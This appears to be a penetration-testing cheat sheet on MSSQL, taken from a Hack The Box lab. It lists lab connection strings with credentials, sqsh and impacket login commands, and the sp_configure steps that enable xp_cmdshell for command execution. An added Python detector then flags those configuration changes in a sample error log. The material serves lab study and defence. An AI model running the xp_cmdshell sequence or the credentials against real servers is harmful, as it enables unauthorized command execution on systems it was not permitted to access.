MSSQL

SQL Server is a common service to find exposed to the outside world.
Requires: valid credentials. With them, commands can be executed on the victim.

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#[email protected];

# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#[email protected]"

# via impacket mssqlclient
# -windows-auth is recommended when authenticating with a domain account.
# Use the machine's NetBIOS name as the domain.
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>

Code Execution

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE;
go
xp_cmdshell 'whoami';
go

-- Check for linked servers
EXEC sp_linkedservers
go
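
Each sp_configure change in the Code Execution sequence above is written to the SQL Server error log as a "Configuration option ... changed from X to Y" message. The detector below is an added example, not part of the original notes; the sample log lines are constructed, and the function names and the watched-option list are assumptions made for illustration.

```python
import re
from datetime import datetime

# Constructed ERRORLOG lines (not taken from a real server).
SAMPLE_ERRORLOG = """\
2024-03-02 09:14:07.31 spid61      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:09.88 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 11:40:12.05 spid74      Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-03-02 13:02:44.10 spid58      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# timestamp, session id, then the sp_configure change message
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>\S+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>-?\d+) to (?P<new>-?\d+)\."
)

# Assumption: the two options toggled in the notes above are the ones to watch.
WATCHED = {"xp_cmdshell", "show advanced options"}

def find_config_changes(text):
    """Return one dict per sp_configure change recorded in the log text."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({
                "time": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "spid": m["spid"],
                "option": m["opt"].lower(),
                "old": int(m["old"]),
                "new": int(m["new"]),
            })
    return events

def alerts(text):
    """Flag watched options being switched on; xp_cmdshell is rated high."""
    out = []
    for e in find_config_changes(text):
        if e["option"] in WATCHED and e["old"] == 0 and e["new"] == 1:
            sev = "high" if e["option"] == "xp_cmdshell" else "medium"
            out.append((sev, e["spid"], e["option"], e["time"].isoformat(sep=" ")))
    return out

if __name__ == "__main__":
    for a in alerts(SAMPLE_ERRORLOG):
        print(*a)
```

Changes that turn an option off, or that touch unrelated options, are parsed but not alerted on, so routine tuning does not drown out the xp_cmdshell enable event.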